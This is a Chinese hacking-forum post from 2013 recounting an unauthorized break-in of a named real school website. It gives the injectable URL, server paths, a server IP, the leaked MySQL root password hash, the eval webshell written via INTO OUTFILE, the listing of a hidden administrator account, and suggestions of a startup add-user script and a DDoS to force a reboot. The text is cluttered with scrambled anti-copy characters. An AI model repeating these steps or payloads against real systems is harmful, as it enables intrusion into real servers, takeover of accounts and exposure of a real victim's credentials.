找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2678|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏# k* S2 x( Z: y, Q0 g
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!1 I# _2 S+ a& P1 Z' M) X

4 \5 R4 F4 Y8 p% T6 d) n
9 ?0 y' i) A6 x. T: d& x! G) @8 Y) u
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
) r5 x4 Q! i2 v' O" ~$ R. ]8 ?4 V3 J1 _) S- y; U
那么想可以直接写入shell ,getshell有几个条件:  h4 k; J) ]' u( u; B
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF& e6 |9 m2 I$ Z

  Y  q& G, G  B$ y7 {  J试着爆绝对路径:: F+ {' j  n" Q2 H" p5 v
1./phpMyAdmin/index.php?lang[]=1  
: T8 v6 E+ R4 C) q/ {2./phpMyAdmin/phpinfo.php  
# a; G' d1 @. r# X3./load_file()  
# g5 L: X% n: C% p4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
1 T5 l( x; \5 j% I' I) H- [4 B5./phpmyadmin/libraries/select_lang.lib.php  1 _) H, U* \3 G# C: j/ X5 i) ~
6./phpmyadmin/libraries/lect_lang.lib.php  $ {; J' D- D% S
7./phpmyadmin/libraries/mcrypt.lib.php   9 U4 G$ U9 W( Y/ z% R& Z, w" I
8./phpmyadmin/libraries/export/xls.php  
, [9 }' R8 [) k0 _6 ]
1 C4 P0 C1 s* |' `0 [3 L; ~+ h均不行...........................
! m8 [& m) E0 a; h7 e) q1 l3 @0 V/ }; Z3 q5 G
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php, Y2 s$ C  H3 Z/ v
9 O! {. Q+ E; M, Z9 J
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
8 E3 u0 H  y- ?+ I0 c' n
7 x$ t% m9 I+ M9 {" _默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败9 s. U, l- `3 E7 s
) i& N( X/ ^5 s# h6 a2 l# ~( u
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........$ _3 S5 O- X/ s! E! f

# I% Y6 D" M8 c* {" R想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 7 g0 a/ u5 o# o# W% @3 {& P" s
) ]1 \! b/ Q( r$ [" [# c
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini 6 F$ W8 U3 x. M9 v8 A

, `8 d$ d$ R* Q0 w自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
6 I" C5 b4 Z- C% g
: J0 a5 k2 E3 M  P成功读到root密码:
# O- k5 @- r, R; E" k: ?
; `7 N. i& _' U5 ?3 v17---- r(0072)
2 ]4 E5 ^% ]8 H. X5 c18---- o(006f)
% c0 @* g. D5 A# a. F) l0 E1 x9 K* x19---- o(006f)
# J  E$ I; P4 V$ o20---- t(0074)
4 E+ B$ Z% s- g( s! m- G* j3 J21---- *(002a)
1 h1 A; Y, y  P; x0 G22---- 8(0038)! A) w7 A( E3 X1 G  P
23---- 2(0032)
* o- g8 I6 y4 G5 s2 x# ^24---- E(0045)
7 w- l# J+ Y5 B0 Q0 W25---- 1(0031)
" k4 C( L% [# G! \26---- C(0043)
6 w9 f$ R, ?! W: @; t& {3 M! V27---- 5(0035)% {+ h$ [) d& j2 L
28---- 8(0038)% F: X! F$ G  q1 r) r
29---- 2(0032)
6 e5 k1 p, i: Z  M5 w' D$ \4 a& H30---- 8(0038)! S) |( N# @1 N& u% F2 e' Z
31---- A(0041)9 w6 _( s2 O8 G) Q6 D
32---- 9(0039)( j2 f- J8 w' T3 _5 \9 d
33---- B(0042): }& q7 a- G! n+ C* Q
34---- 5(0035)6 r+ f9 e$ J# g9 y
35---- 4(0034)  ]/ O: F! I  `* {
36---- 8(0038)3 [. w6 {6 A2 b$ o7 p) N" n; p
37---- 6(0036)  d# J5 Q. ], E% N6 ?* T& P
38---- 4(0034)$ c, K$ M. b" J: u# E
39---- 9(0039)
( I$ |- K- W" s2 F40---- 1(0031)2 z2 G9 z' s8 W% w
41---- 1(0031)8 F. k( }9 w  u! A# l
42---- 5(0035)! V& A2 e8 s0 Z+ V% }9 M: a- J
43---- 3(0033)
. n# p. o8 x4 g4 H/ o& e44---- 5(0035)0 @9 v1 {$ y3 X2 V% e( D# q* M
45---- 9(0039)- y: C( ~9 d9 d1 |
46---- 8(0038)
, j% P% \5 h1 W% n0 K6 c7 a47---- F(0046)
- \2 h; {( ?0 x) X* Y+ n48---- F(0046)) c  s9 _  y  v- q4 Z) h
49---- 4(0034)3 x5 v0 I6 I' |
50---- F(0046)
! O) p1 |" u4 n9 T51---- 0(0030). q( m. J1 Z6 o7 i% k# i
52---- 3(0033)/ Y1 D7 c* u  `
53---- 2(0032)
8 X- r+ s/ p/ K# V2 |54---- A(0041)
3 r0 }) X, s: B& c" Q* r5 t55---- 4(0034)! s3 q/ r5 x  Y( b( L
56---- A(0041). ]1 G2 K' {+ \2 v; P, W% }- ]
57---- B(0042), L5 X$ A! H& O  w" B$ L
58---- *(0044)
. V. E* ]5 f+ M/ K% s8 w3 [59---- *(0035)1 F: r  T/ W  E8 t9 Q( k
60---- *(0041)% \( H: ]# C1 m8 f
61---- *0032)
( T5 w6 g& r. ]9 e0 `7 }, U6 `+ i# e+ _0 y/ Z% _2 N
解密后成功登陆phpmyamin
0 e3 u; Z5 T, J1 G5 _) d" h                          
! \. G8 d! n+ W; |( d" e
/ J0 F) [6 H5 q, F/ y                             . r& G/ _5 s* G6 K5 r/ S' c
+ E) T1 r' f( `& V
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'4 P! ^( ?2 B! I, h$ t" }+ ]
$ u6 L+ f1 M( g" d* `; z# L
成功执行,拿下shell,菜刀连接:* v& p! Z8 `8 P5 l  V4 t  R% g( b, v% X
) ?+ b0 x3 X) o5 G
服务器不支持asp,aspx,php提权无果...................
' ~+ q7 q: w3 Z1 O
! ]- u+ `5 X+ _5 Y* J但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:- j: X- I5 o4 P9 S  N- d* n
服务器上已经有个隐藏帐号了

& Y# ^& ~( n! @
别名     administrators
9 s4 ~. Q; U7 b+ s注释     管理员对计算机/域有不受限制的完全访问权

1 {1 u3 u, p2 Q
成员
: H  O7 a/ E- c
-------------------------------------------------------------------------------
. G+ `" S7 h( q0 _+ Qadmin
8 N- Q6 U- r7 Z. k% u" _! p9 nAdministrator: i3 T7 \7 G! Q! f& F3 L" `3 V
slipper$4 k8 F, x7 p) K6 }& y0 h& [- @- @! x
sqluser
* i/ {. z* s- ?; y$ {命令成功完成。 " K) Z" d5 M. H  S6 q8 F) r+ i9 e
) y: F/ n; S) F7 v; D
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
" {! F4 T5 ]9 V3 i1 [
& N- r1 e  E' M2 o  \2 S& e" Zddos服务器重启,不然就只能坐等服务器重启了...............................
4 `$ \2 S- f* n- a
+ M0 Z% \$ e. n9 `: x- m& l      
0 @6 [5 e( ?7 U2 K5 ]3 B- h

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表